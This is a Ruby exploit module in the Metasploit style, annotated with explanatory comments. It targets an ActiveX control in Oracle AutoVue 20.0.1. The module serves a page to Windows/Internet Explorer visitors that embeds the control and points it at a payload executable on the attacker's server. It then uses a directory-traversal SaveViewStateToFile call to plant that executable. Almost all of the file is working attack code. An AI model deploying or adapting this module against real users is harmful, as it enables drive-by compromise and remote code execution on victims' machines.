##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	# Browser-side module: it serves an HTML page that embeds an ActiveX
	# control by CLSID (see on_request_uri) and, on a follow-up request for
	# a fixed file name, an executable built from the configured payload.
	Rank = GoodRanking

	# HttpServer::HTML provides the listener plus on_request_uri,
	# send_response, send_not_found and get_resource; EXE provides
	# generate_payload_exe.
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	# Module metadata only. Note that 'Description' is still the literal
	# placeholder "Module Description" and 'Version' relies on the
	# $Revision$ keyword being expanded by version control.
	def initialize(info={})
		super(update_info(info,
			'Name'           => "Oracle AutoVue 20.0.1 SaveViewStateToFile Vulnerability",
			'Description'    => %q{Module Description},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'rgod',    #Initial discovery, poc
					'sinn3r',  #Metasploit
				],
			'References'     =>
				[
					['BID', '50321'],
					['URL', 'http://www.exploit-db.com/exploits/18016/']
				],
			'Payload'        =>
				{
					'BadChars' => "",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows', {} ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))
	end

	# Handles every HTTP request that reaches the module's resource.
	#
	# cli     - the client connection; only peerhost/peerport are read and
	#           replies are written back to it
	# request - the parsed HTTP request; the User-Agent header and the URI
	#           are the only fields consulted
	#
	# Three outcomes: a 404 for any client whose User-Agent does not claim
	# both Windows NT and MSIE, the payload executable for a URI matching
	# /MicroStation\.dgn/, and the HTML/JavaScript page for everything else.
	def on_request_uri(cli, request)
		# If the client isn't Win / IE, no point to continue. Both regexes
		# have to match; `or` binds looser than `!~`, so the condition reads
		# as intended. A missing User-Agent (nil) also fails `=~` and is
		# rejected on this path.
		agent = request.headers['User-Agent']
		if agent !~ /Windows NT \d\.\d/ or agent !~ /MSIE \d\.\d/
			print_error("Target not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		print_status(request.uri)  # every URI reaching the handler is logged

		# Send our payload if requested: any URI containing MicroStation.dgn
		# (the name the served page points at below) gets the generated EXE.
		if request.uri =~ /MicroStation\.dgn/
			# Nothing to serve when no payload can be (re)generated for this client
			return if ((p = regenerate_payload(cli)) == nil)
			exe = generate_payload_exe({ :code => p.encoded })
			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
			send_response(cli, exe, {'Content-Type' => 'application/octet-stream'})
			return
		end

		# Get our server's IP: when bound to all interfaces, use the local
		# address that routes to this client; otherwise SRVHOST as configured.
		if datastore['SRVHOST'] == '0.0.0.0'
			host_ip = Rex::Socket.source_address(cli.peerhost)
		else
			host_ip = datastore['SRVHOST']
		end

		# Server's endpoint (host:port) that the served page refers back to
		host = host_ip + ":" + datastore['SRVPORT']

		# URL handed to the control as its SRC; the branch above answers it
		# with the payload executable.
		src_path = "http://#{host}#{get_resource()}/MicroStation.dgn"

		# Script placed on the page: sets the control's SRC, asks it to
		# restore view state from <resource>/sample.dmp (no branch in this
		# handler serves that name, so that request receives this same
		# HTML), then calls SaveViewStateToFile 6666 times with a fixed
		# directory-traversal path, swallowing every exception. The
		# traversal string and the CLSID below are the recognisable
		# artefacts of this page in web logs or proxy captures.
		js = <<-JS
		obj.SRC = "#{src_path}";
		obj.RestoreViewStateFromFile("http://#{host}#{get_resource()}/sample.dmp");
		for (i=0; i<6666; i++) {
			try {
				obj.SaveViewStateToFile("../../../../../../../../../../boot.ini");
			}
			catch(e) {
			}
		}
		JS

		# Page body: the control is embedded by a fixed CLSID (presumably
		# the AutoVue control named in the module metadata) and the script
		# above runs once parsing finishes (defer). The <object .../> tag
		# is written self-closing and still followed by </object>, exactly
		# as in the original.
		html = <<-HTML
		<html>
		<object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 height=480 />
		</object>
		<script defer=defer>
		#{js}
		</script>
		</html>
		HTML

		print_status("Sending HTML to: #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type' => 'text/html'})
	end

	# Framework entry point: picks a random five-letter .dgn file name and
	# then defers to the HttpServer mixin to start serving. Note that
	# on_request_uri never reads @payload_name; it matches and references
	# the fixed name MicroStation.dgn instead, so the random name is unused
	# within this file.
	def exploit
		@payload_name = rand_text_alpha(5) + ".dgn"
		super
	end
end

=begin
Testing version:
Oracle AutoVue Electro-Mechanical Professional 20.0.2 Desktop Version
Build 790: 2011-08-29

Not vulnerable?
MD5  (AutoVueX.ocx) = eb32aa5068b843f8ebb4d4b83eb5e5ab
SHA1 (AutoVueX.ocx) = dce6f88870c8fe1ff7c50db50d4a3db4947cbdd4
=end